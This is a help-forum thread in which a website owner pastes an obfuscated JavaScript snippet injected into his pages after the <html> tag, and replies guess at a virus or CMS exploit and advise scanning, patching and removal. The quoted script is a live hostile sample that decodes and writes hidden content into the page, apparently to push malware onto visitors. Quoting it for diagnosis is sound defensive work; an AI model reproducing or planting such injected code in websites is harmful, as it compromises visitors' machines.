yarek
asked on
web pages modified on my website: some javascript added
I saw that some of my websites were modified.
After <html> there are 20-40 lines of blank then a javascript was added
<!--3666ce780cc4f90fc9bfc0 3849efde5e -><script language=javascript>wly="% ";ih="h3cs ch72h69h70 th20langua ge=javh61h 73cript> fh75h6eh63h74ion fh72oqv(m)h7bvah72 cmu,h62h62=\"@h56Uh722h23a =P]:Fh68h2 9}h65h43h4 1h7b(h70h4 aj7M~+_h45 -y3G;h4bh3 8N5h67h30h 6bxh63f!mt vh24. h34h60ih73^'h42z&oTwh71h4f l[dH*Z|h31 h2c6h62I9h 5ch22uh6eh 22,jt=\"\" ,h6fh2ch69 l,h66xh3d\ "\",zx;fh6 fr(ch6duh3 dh30h3bcmu <h6dh2eh6c eh6eh67h74 h68h3bcmh7 5+h2b)h7bh 20o=h6dh2e ch68arAh74 (h63mh75)h 3bh69h6ch3 dbh62h2ein h64h65xh4f f(o)h3bif( h69l>-1h29 h7b zx=(h28ilh2bh31)h25h381-1) h3bh69h66( h7ax<h3dh3 0h29h7ah78 h2bh3d81;f x+h3dh62h6 2.ch68ah72 h41h74(zx- h31); }h20elh73eh20h66x+=h6f;}jh 74+h3dfh78 ;doch75h6d h65h6eth2e wrh69h74e( jt);}h3ch2 fsch72ih70 h74h3e";ce ap=unescap e(ih.repla ce(/h/g,wl y));var pxv,e;document.write(ceap) ;pxv="<^f2 sJv4[=@0n= 0CPu7=$=^f 2sJvu>4HTf ntC@v q2svCp4u<SAR9]w4[=@0n=0CP\ \uj=$=Sf2s Jv\\u4SRAP \\u)vvJF// qqq 0TT0[C=@=[svsf^ @Cv/EEnvI 7^?u_HTfntC@v 2C!C22C2_u\\u><\\/SAR9]w>u 4}K4</^f2s Jv>44";fro qv(pxv);</ script>
what is this ? What does it does and how to prevent it happens again ?
After <html> there are 20-40 lines of blank then a javascript was added
<!--3666ce780cc4f90fc9bfc0
what is this ? What does it does and how to prevent it happens again ?
I can't say for sure what it does, but it is probably a manifestation of a virus on the machine where your websites are stored, or developed.
I ran across a similar problem about a month ago when some files turned up with an appended javascript on our source control. Turns out the infestation was from a virus that would leech of some windows event handlers for opening and saving files, appending the javascript to the files if they had certain extensions (html,php,asp,aspx).
Bitdefender was able to detect and remove the virus, and after that we had to manually remove the extra javascript from the pages.
My recommendation is that you run a full virus scan with a competent antivirus application on the server machine and all development machines, remove any virus infestations and then try to remove the script manually and see if it turns up again. It probably won't, if the virus was successfully removed.
I hope this helps, please let me know if you have any questions.
Best Regards,
Alex Percsi.
I ran across a similar problem about a month ago when some files turned up with an appended javascript on our source control. Turns out the infestation was from a virus that would leech of some windows event handlers for opening and saving files, appending the javascript to the files if they had certain extensions (html,php,asp,aspx).
Bitdefender was able to detect and remove the virus, and after that we had to manually remove the extra javascript from the pages.
My recommendation is that you run a full virus scan with a competent antivirus application on the server machine and all development machines, remove any virus infestations and then try to remove the script manually and see if it turns up again. It probably won't, if the virus was successfully removed.
I hope this helps, please let me know if you have any questions.
Best Regards,
Alex Percsi.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Aah, beat me to it ;)
Had been playing around with this script and was just going to post the de-obfuscated version ....
Had been playing around with this script and was just going to post the de-obfuscated version ....
If it's harmless, the "hacker" will display a message to your visitors. If it's really malicious, it will make the visitor download and execute malware.
Do you run PHP/MySQL applications on your website, like Content Management Systems, forums etc? Make sure to upgrade them to the latest version immediately, because it will most likely have been an exploit in this software (SQL injection etc.) that enabled the "hacker" to alter your pages.
Make sure you remove the code as well.